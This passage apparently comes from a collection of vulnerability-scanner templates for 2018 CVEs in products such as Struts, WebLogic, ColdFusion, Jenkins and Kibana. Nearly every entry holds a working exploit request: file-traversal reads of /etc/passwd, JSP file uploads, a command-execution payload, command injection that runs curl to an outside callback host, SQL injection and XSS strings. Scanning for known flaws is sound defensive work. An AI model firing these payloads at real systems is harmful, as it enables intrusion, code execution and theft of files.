name=\"_drupal_ajax\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14918","info":{"name":"LOYTEC LGATE-902 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15961","info":{"name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\nContent-Type: image/jpeg\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2018-15961\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"path\"\n\n{{randstr}}.jsp\n-----------------------------24464570528145--\n","GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["ddbb3e76f92e78c445c8ecb392beb225"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12300","info":{"name":"Seagate NAS OS 4.3.15.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-11473","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /users/registration HTTP/1.1\nHost: {{Hostname}}\n","POST /users/registration HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-3714","info":{"name":"node-srv - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/node_modules/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7467","info":{"name":"AxxonSoft Axxon Next - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-1000600","info":{"name":"Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-7700","info":{"name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4cc32a3a81d2bb37271934a48ce4468a"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13380","info":{"name":"Fortinet FortiOS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B","{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>","<script>alert(1337)</script>"],"condition":"or"},{"type":"word","part":"header","negative":true,"words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10818","info":{"name":"LG NAS Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /system/sharedir.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n","POST /en/php/usb_sync.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-19136","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>&really_del=1\">YES"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16668","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/repository"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["** Platform sources **","** Application sources **"],"condition":"and"}]}]},{"id":"CVE-2018-15535","info":{"name":"Responsive FileManager <9.13.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10201","info":{"name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini","{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini","{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-17422","info":{"name":"DotCMS < 5.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com","{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["self.location = 'http://evil.com'","location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"]}]}]},{"id":"CVE-2018-16159","info":{"name":"WordPress Gift Voucher <4.1.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"images\") && contains(body, \"title\")"],"condition":"and"}]}]},{"id":"CVE-2018-2894","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ws_utc/resources/setting/options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsetting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80\n","POST /ws_utc/resources/setting/keystore HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_name\"\n\n{{randstr}}\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_edit_mode\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_front\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_changed\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_filename\"; filename=\"{{randstr}}.jsp\"\nContent-Type: application/octet-stream\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n\n<%\nString cve = \"CVE-2018-2894\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  //0x03 is equal to 0x3, but we need 0x03 for our md5sum\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\n\nout.println(hashedpasswd.toString());\n%>\n------WebKitFormBoundaryuim0dyiDSPBPu31g--\n","GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["26ec00a3a03f6bfc5226fd121567bb58"]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}"],"internal":true}]}]},{"id":"CVE-2018-1000130","info":{"name":"Jolokia Agent - JNDI Code Injection","severity":"high"},"requests":[{"raw":["POST /jolokia/read/getDiagnosticOptions HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.\nContent-Type: application/x-www-form-urlencoded\n\n{\n   \"type\":\"read\",\n   \"mbean\":\"java.lang:type=Memory\",\n   \"target\":{\n      \"url\":\"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\"\n   }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3760","info":{"name":"Ruby On Rails - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","regex":["/etc/passwd is no longer under a load path: (.*?),"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-11776","info":{"name":"Apache Struts2 S2-057 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15917","info":{"name":"Jorani Leave Management System 0.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1\nHost: {{Hostname}}\n","GET /session/login HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","_jorani"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8719","info":{"name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"],"matchers-condition":"and","matchers":[{"type":"word","words":["[TXT]",".log","Index of"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16671","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/device-id"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["circontrol"]},{"type":"regex","part":"body","regex":["(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"]}]}]},{"id":"CVE-2018-14916","info":{"name":"Loytec LGATE-902 <6.4.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7251","info":{"name":"Anchor CMS 0.12.3 - Error Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/anchor/errors.log"],"matchers":[{"type":"word","words":["\"date\":","\"message\":","\"trace\":["],"condition":"and"}]}]},{"id":"CVE-2018-19137","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&really_del"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16283","info":{"name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-17246","info":{"name":"Kibana - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"An internal server error occurred\""]},{"type":"word","part":"header","words":["kbn-name","kibana"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2018-16341","info":{"name":"Nuxeo <10.3 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"],"matchers":[{"type":"word","part":"body","words":["31333333337"]}]}]},{"id":"CVE-2018-1000861","info":{"name":"Jenkins - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["package#vulntest"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12998","info":{"name":"Zoho manageengine - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19751","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/ssl-fields/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test\n","GET /admin/ssl-fields/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9161","info":{"name":"PrismaWEB - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/scripts/login_par.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["txtChkUser","txtChkPassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19877","info":{"name":"Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>confirm(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16133","info":{"name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-20010","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider-account.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=\n","GET /assets/ssl-accounts.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-18809","info":{"name":"TIBCO JasperReports Library - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["metadata.jdbc.driverClassName","metadata.hibernate.dialect"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000533","info":{"name":"GitList < 0.6.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /{{path}}/tree/a/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nquery=--open-files-in-pager=cat%20/etc/passwd\n"],"matchers":[{"type":"word","part":"body","words":["root:/root:/bin/bash"]}],"extractors":[{"type":"regex","name":"path","group":1,"regex":["<span class=\"name\">(.*?)</span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-11784","info":{"name":"Apache Tomcat - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","negative":true,"status":[404]}]}]},{"id":"CVE-2018-19749","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/account-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=\n","GET /assets/account-owners.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, '><script>alert(document.domain)</script></a>')"],"condition":"and"}]}]},{"id":"CVE-2018-6910","info":{"name":"DedeCMS 5.7 - Path Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/include/downmix.inc.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["downmix.inc.php","Call to undefined function helper()"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16059","info":{"name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/fcgi-bin/wgsetcgi"],"body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6184","info":{"name":"Zeit Next.js <4.2.3 -  Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20824","info":{"name":"Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)timeout:\\salert\\(document\\.domain\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11231","info":{"name":"Opencart Divido - Sql Injection","severity":"high"},"requests":[{"raw":["POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1\nHost: {{Hostname}}\n\n{\"metadata\":{\"order_id\":\"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)\"},\"status\":2}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18778","info":{"name":"ACME mini_httpd <1.30 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost:\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000226","info":{"name":"Cobbler - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>_CobblerXMLRPCInterface__make_token</methodName>\n  <params>\n    <param>\n      <value>\n        <string>cobbler</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), '<name>faultCode</name>')"]},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"word","part":"body","words":["<methodResponse>"]},{"type":"regex","part":"body","regex":["(.*[a-zA-Z0-9].+==)</string></value>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7719","info":{"name":"Acrolinx Server <5.2.5 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-20009","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=\n","GET /assets/ssl-providers.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-19326","info":{"name":"Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-5230","info":{"name":"Atlassian Jira Confluence - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iframe src=\"javascript:alert(document.domain)\">","confluence"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5715","info":{"name":"SugarCRM 3.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&\"/><script>alert(1)</script>=&\"><< Back</a><br><br>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7422","info":{"name":"WordPress Site Editor <=1.1.1 - Local File 